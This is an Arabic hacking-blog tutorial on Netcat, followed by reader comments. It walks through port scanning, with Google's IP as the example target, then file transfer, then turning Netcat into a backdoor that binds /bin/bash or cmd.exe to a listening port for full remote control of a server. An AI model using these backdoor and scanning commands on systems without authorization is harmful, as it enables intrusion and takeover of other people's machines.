شرح أداة Netcat – The Swiss Army Knife
كتب بتاريخ: Jan 22nd, 2008 | بواسطة: عبدالمهيمن
السلام عليكم ورحمة الله وبركاته
Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools
استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها
فحص المنافذ المفتوحة في السيرفر
تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر
nc -v -w1 SERVER-IP -z FromPort-ToPortأما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
nc -v -w1 64.233.183.147 -z 1-100ولفحص أكثر من نطاق منافذ نستعمل الأمر
nc -v -w1 -z 64.233.183.147 -z 1-100 400-500ملاحظة: 64.233.183.147 هو IP موقع Google
نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل
nc SERVER-IP PORT < FILEونطبق الأمر في الجهاز المستقبل
nc -l -p PORT > FILEمثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
nc 192.168.0.45 5555 < data.txtأما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
nc -l -p 5555 > data.txtجعل الـ Netcat تعمل كـ Backdoor
هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر
nc -l -p PORT -e PROGRAMمع اضافة -d و -L في ويندوز ليصبح الأمر
nc -l -p PORT -d -e PROGRAM -Lمثال على هذه الخاصية نقوم بتطبيق الأمر
nc -l -p 4455 -e /bin/bashعلى السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل
nc -l -p 4455 -e -d cmd.exe -Lوللاتصال بالسيرفر نطبق الأمر
nc -v -n SERVER-IP 4455وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر
nc -hتحميل أداة Netcat لنظام لينوكس | تحميل أداة Netcat لنظام ويندوز
ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان
أرجو أن ينال الشرح اعجابكم
تحياتي Br4v3-H34r7.
انا اليوم بعد ما تعبت في الهاكينج و البحث عرفت المدونه دي بس الحمد لله اني عرفتها اصلا و مشكور اخي
السلام عليكم
بعد اكمال الاطلاع والتنفيذ
شكرا جزيلا اخي العزيز على الشرح..انت فعلا ساعدتني بفهم البرنامج
وان شاء الله ححاول اكون مفيدة واضيف استخدام اخر
وفقك ربي
تسلم والله على الدرس الجميل الاكثر من رائع
شـكــ وبارك الله فيك ـــرا لك … لك مني أجمل تحية .
السسلام عليكم
اخي عبد المهيمـن ، انا جربت متـل ما قلـت بالششرح لكـن طلع لـى هاد المسسج !!!
inverse host lookup failed: h_errno 11004: NO_DATA
وهآذ
(UNKNOWN) [Ip server] 97 (?): TIMEDOUT
يعني 97 هـو البورت !!
انتظر الاجابـه
تحيآتـى
@HaCk-dz: رسالة inverse host lookup failed تعني وجود مشكلة بالـ DNS الرسالة التالية تعني عدم تمكن الأداة من الاتصال مع الـ IP الذي حددته عن طريق المنفذ 97.
مشكور اخوي القدير عبد المهمين وان وما شاء الله مدونة احلى من اي مدونة اخرى اشكرك على فتخها واستفادة الجميع منها وشكرا على الشرح
بارك الله فيك اخي
شرح رائع ومواضيعك في القمة
واصل بدون فواصل
كفوو والله يا ابن البلد
مشكور حبيبي عبدالمهيمن
مدونة رائعه والله
السلام عليكم
شرح ممتاز لكن ناقصه شيئ وهو الاتصال بالسرفر وتخطي المشاكل
انا لدي مشاكل عندما اتصل
لا استطيع تضهر فقط TIMEDOUT او OPEN و فقط
عاشو على هذا الشرح >>>>>>>>>>>>العراقي
غريب و الله
انا منزمان ما شفت شرح رائع متل هالشرح
مشكور أخ بريف
و انشالله نشوف المزيدمن ابداعاتك
^_^
مشكور اخوي على الشرح الوافي
اجعلو شعاركم لا للبرايفت
انت راجل باشا و رئيس قسم, بجد حاولت افهم من مواقع اجنبيه وعربية بس اللى فهمنى مقالك ده, مع انك كاتبو من سنتين بس شوف العمل الطيب بيقعد للشخص و الدعوة انشالله تكون وصلتلك يا جميل
انا اخ محمد الحارسي فيى العراق صديقك اريد ان اكون صديقك ولدي كثي لاقول لك وانشاءالله سيستفيد كلنا من الاخر مع تحياتي لك